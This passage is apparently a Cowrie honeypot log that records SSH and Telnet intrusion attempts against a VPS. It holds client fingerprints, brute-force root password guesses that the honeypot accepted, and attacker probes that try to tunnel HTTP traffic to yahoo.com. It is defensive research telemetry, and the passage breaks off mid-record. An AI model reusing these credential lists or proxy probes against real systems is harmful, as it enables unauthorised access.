{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59389,"dst_ip":"1.2.3.4","dst_port":22,"session":"ffc843ce02df","protocol":"ssh","message":"New connection: 212.227.125.160:59389 (1.2.3.4:22) [session: ffc843ce02df]","sensor":"my-vps","timestamp":"2025-08-26T16:46:55.396406Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:46:58.451651Z","src_ip":"212.227.125.160","session":"ffc843ce02df"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:46:58.452705Z","src_ip":"212.227.125.160","session":"ffc843ce02df"}
{"eventid":"cowrie.login.success","username":"root","password":"Huawei@123","message":"login attempt [root/Huawei@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:47:11.767554Z","src_ip":"212.227.125.160","session":"ffc843ce02df"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56298,"dst_ip":"1.2.3.4","dst_port":23,"session":"08c99d5bdf8f","protocol":"telnet","message":"New connection: 212.227.235.229:56298 (1.2.3.4:23) [session: 08c99d5bdf8f]","sensor":"my-vps","timestamp":"2025-08-26T16:47:17.604894Z"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:47:20.651840Z","src_ip":"212.227.125.160","session":"ffc843ce02df"}
{"eventid":"cowrie.command.input","input":"pwd","message":"CMD: pwd","sensor":"my-vps","timestamp":"2025-08-26T16:47:20.652575Z","src_ip":"212.227.125.160","session":"ffc843ce02df"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","size":6,"shasum":"a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8","duplicate":true,"duration":"2.5","message":"Closing TTY Log: var/lib/cowrie/tty/a1159e9df3670d549d04524532629f5477ceb7deec9b45e47e8c009506ecb2c8 after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:47:23.200516Z","src_ip":"212.227.125.160","session":"ffc843ce02df"}
{"eventid":"cowrie.session.closed","duration":"30.5","message":"Connection lost after 30.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:47:25.874184Z","src_ip":"212.227.125.160","session":"ffc843ce02df"}
{"eventid":"cowrie.session.closed","duration":30.740827798843384,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:47:48.345626Z","src_ip":"212.227.235.229","session":"08c99d5bdf8f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36128,"dst_ip":"1.2.3.4","dst_port":23,"session":"6edb5d4761ac","protocol":"telnet","message":"New connection: 212.227.235.229:36128 (1.2.3.4:23) [session: 6edb5d4761ac]","sensor":"my-vps","timestamp":"2025-08-26T16:48:08.537309Z"}
{"eventid":"cowrie.session.connect","src_ip":"213.209.150.239","src_port":52313,"dst_ip":"1.2.3.4","dst_port":22,"session":"0168101e6302","protocol":"ssh","message":"New connection: 213.209.150.239:52313 (1.2.3.4:22) [session: 0168101e6302]","sensor":"my-vps","timestamp":"2025-08-26T16:48:17.889282Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-26T16:48:17.890491Z","src_ip":"213.209.150.239","session":"0168101e6302"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-26T16:48:17.947601Z","src_ip":"213.209.150.239","session":"0168101e6302"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:48:18.230779Z","src_ip":"213.209.150.239","session":"0168101e6302"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.143.26","dst_port":80,"src_ip":"213.209.150.239","src_port":31042,"message":"direct-tcp connection request to 74.6.143.26:80 from 127.0.0.1:31042","sensor":"my-vps","timestamp":"2025-08-26T16:48:18.288382Z","session":"0168101e6302"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.143.26","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 74.6.143.26:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T16:48:18.345705Z","src_ip":"213.209.150.239","session":"0168101e6302"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"src_ip":"213.209.150.239","src_port":6265,"message":"direct-tcp connection request to 2001:4998:24:120d::1:1:80 from 127.0.0.1:6265","sensor":"my-vps","timestamp":"2025-08-26T16:48:18.499096Z","session":"0168101e6302"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:24:120d::1:1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 2001:4998:24:120d::1:1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T16:48:18.556080Z","src_ip":"213.209.150.239","session":"0168101e6302"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:48:18.613386Z","src_ip":"213.209.150.239","session":"0168101e6302"}
{"eventid":"cowrie.session.closed","duration":30.617904901504517,"message":"Connection lost after 30 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:48:39.155145Z","src_ip":"212.227.235.229","session":"6edb5d4761ac"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.215","src_port":33982,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1ce3a725cae","protocol":"ssh","message":"New connection: 45.88.8.215:33982 (1.2.3.4:22) [session: f1ce3a725cae]","sensor":"my-vps","timestamp":"2025-08-26T16:49:13.683317Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:49:14.030332Z","src_ip":"45.88.8.215","session":"f1ce3a725cae"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:49:14.031108Z","src_ip":"45.88.8.215","session":"f1ce3a725cae"}
{"eventid":"cowrie.login.success","username":"root","password":"Neelam@123","message":"login attempt [root/Neelam@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:49:16.140181Z","src_ip":"45.88.8.215","session":"f1ce3a725cae"}
{"eventid":"cowrie.session.closed","duration":"3.1","message":"Connection lost after 3.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:49:16.745211Z","src_ip":"45.88.8.215","session":"f1ce3a725cae"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43200,"dst_ip":"1.2.3.4","dst_port":23,"session":"8cd304d685e5","protocol":"telnet","message":"New connection: 212.227.125.160:43200 (1.2.3.4:23) [session: 8cd304d685e5]","sensor":"my-vps","timestamp":"2025-08-26T16:49:43.640939Z"}
{"eventid":"cowrie.session.closed","duration":12.42885422706604,"message":"Connection lost after 12 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:49:56.069684Z","src_ip":"212.227.125.160","session":"8cd304d685e5"}
{"eventid":"cowrie.session.connect","src_ip":"176.65.149.186","src_port":47568,"dst_ip":"1.2.3.4","dst_port":23,"session":"3e11affd5177","protocol":"telnet","message":"New connection: 176.65.149.186:47568 (1.2.3.4:23) [session: 3e11affd5177]","sensor":"my-vps","timestamp":"2025-08-26T16:50:42.111015Z"}
{"eventid":"cowrie.login.success","username":"root","password":"adminHW","message":"login attempt [root/adminHW] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:50:42.148974Z","src_ip":"176.65.149.186","session":"3e11affd5177"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T16:50:42.222291Z","src_ip":"176.65.149.186","session":"3e11affd5177"}
{"eventid":"cowrie.command.input","input":"1","message":"CMD: 1","sensor":"my-vps","timestamp":"2025-08-26T16:50:42.223660Z","src_ip":"176.65.149.186","session":"3e11affd5177"}
{"eventid":"cowrie.command.failed","input":"1","message":"Command not found: 1","sensor":"my-vps","timestamp":"2025-08-26T16:50:42.224493Z","src_ip":"176.65.149.186","session":"3e11affd5177"}
{"eventid":"cowrie.session.connect","src_ip":"3.93.219.185","src_port":44876,"dst_ip":"1.2.3.4","dst_port":22,"session":"26dfdd5856f1","protocol":"ssh","message":"New connection: 3.93.219.185:44876 (1.2.3.4:22) [session: 26dfdd5856f1]","sensor":"my-vps","timestamp":"2025-08-26T16:50:48.435574Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:50:49.949974Z","src_ip":"3.93.219.185","session":"26dfdd5856f1"}
{"eventid":"cowrie.client.kex","hassh":"9052c4ab4164c78256e71143dcfc7eac","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 9052c4ab4164c78256e71143dcfc7eac","sensor":"my-vps","timestamp":"2025-08-26T16:50:49.951121Z","src_ip":"3.93.219.185","session":"26dfdd5856f1"}
{"eventid":"cowrie.session.closed","duration":"6.4","message":"Connection lost after 6.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:50:54.809782Z","src_ip":"3.93.219.185","session":"26dfdd5856f1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63435,"dst_ip":"1.2.3.4","dst_port":22,"session":"0175b35f8a21","protocol":"ssh","message":"New connection: 212.227.125.160:63435 (1.2.3.4:22) [session: 0175b35f8a21]","sensor":"my-vps","timestamp":"2025-08-26T16:50:56.362440Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-26T16:50:56.363447Z","src_ip":"212.227.125.160","session":"0175b35f8a21"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-26T16:50:56.447339Z","src_ip":"212.227.125.160","session":"0175b35f8a21"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis","message":"login attempt [marquis/marquis] failed","sensor":"my-vps","timestamp":"2025-08-26T16:50:56.867121Z","src_ip":"212.227.125.160","session":"0175b35f8a21"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis1","message":"login attempt [marquis/marquis1] failed","sensor":"my-vps","timestamp":"2025-08-26T16:50:57.953653Z","src_ip":"212.227.125.160","session":"0175b35f8a21"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis123","message":"login attempt [marquis/marquis123] failed","sensor":"my-vps","timestamp":"2025-08-26T16:50:59.041853Z","src_ip":"212.227.125.160","session":"0175b35f8a21"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis1234","message":"login attempt [marquis/marquis1234] failed","sensor":"my-vps","timestamp":"2025-08-26T16:51:00.128065Z","src_ip":"212.227.125.160","session":"0175b35f8a21"}
{"eventid":"cowrie.login.failed","username":"marquis","password":"marquis12345","message":"login attempt [marquis/marquis12345] failed","sensor":"my-vps","timestamp":"2025-08-26T16:51:01.214449Z","src_ip":"212.227.125.160","session":"0175b35f8a21"}
{"eventid":"cowrie.session.closed","duration":"5.9","message":"Connection lost after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:51:02.301097Z","src_ip":"212.227.125.160","session":"0175b35f8a21"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":51574,"dst_ip":"1.2.3.4","dst_port":22,"session":"c0e87fde3f04","protocol":"ssh","message":"New connection: 217.72.205.35:51574 (1.2.3.4:22) [session: c0e87fde3f04]","sensor":"my-vps","timestamp":"2025-08-26T16:51:05.080454Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:51:05.082311Z","src_ip":"217.72.205.35","session":"c0e87fde3f04"}
{"eventid":"cowrie.session.connect","src_ip":"45.88.8.186","src_port":59326,"dst_ip":"1.2.3.4","dst_port":22,"session":"29728c3fe222","protocol":"ssh","message":"New connection: 45.88.8.186:59326 (1.2.3.4:22) [session: 29728c3fe222]","sensor":"my-vps","timestamp":"2025-08-26T16:52:01.141428Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T16:52:01.575189Z","src_ip":"45.88.8.186","session":"29728c3fe222"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T16:52:01.575962Z","src_ip":"45.88.8.186","session":"29728c3fe222"}
{"eventid":"cowrie.login.success","username":"root","password":"space","message":"login attempt [root/space] succeeded","sensor":"my-vps","timestamp":"2025-08-26T16:52:04.119679Z","src_ip":"45.88.8.186","session":"29728c3fe222"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T16:52:04.761649Z","src_ip":"45.88.8.186","session":"29728c3fe222"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":63580,"dst_ip":"1.2.3.4","dst_port":22,"session":"f54f1ab939e7","protocol":"ssh","message":"New connection: 212.227.125.160:63580 (1.2.3.4:22) [session: f54f1ab939e7]","sensor":"my-vps","timestamp":"2025-08-26T16:52:38.039471Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-ZGrab ZGrab SSH Survey","message":"Remote SSH version: SSH-2.0-ZGrab ZGrab SSH Survey","sensor":"my-vps","timestamp":"2025-08-26T16:52:38.676441Z","src_ip":"212.227.125.160","session":"f54f1ab939e7"}
{"eventid":"cowrie.client.kex","hassh":"dd9bcf093c355da7000132131cb36fd0","hasshAlgorithms":"diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,arcfour256,arcfour128,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,aes192-cbc,aes256-cbc,arcfour,rijndael-cbc@lysator.liu.se;hmac-md5-etm@openssh.com,hmac-sha1-etm@openssh.com,umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-ripemd160-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,hmac-md5,hmac-sha1,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-ripemd160,hmac-ripemd160@openssh.com,hmac-sha1-96,hmac-md5-96;none,zlib@openssh.com,zlib","kexAlgs":["diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-rsa-cert-v00@openssh.com","ssh-dss-cert-v00@openssh.com","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","arcfour256","arcfour128","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","aes192-cbc","aes256-cbc","arcfour","rijndael-cbc@lysator.liu.se"],"macCS":["hmac-md5-etm@openssh.com","hmac-sha1-etm@openssh.com","umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-ripemd160-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","hmac-md5","hmac-sha1","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-ripemd160","hmac-ripemd160@openssh.com","hmac-sha1-96","hmac-md5-96"],"compCS":["none","zlib@openssh.com","zlib"],"langCS":[""],"message":"SSH client hassh fingerprint: 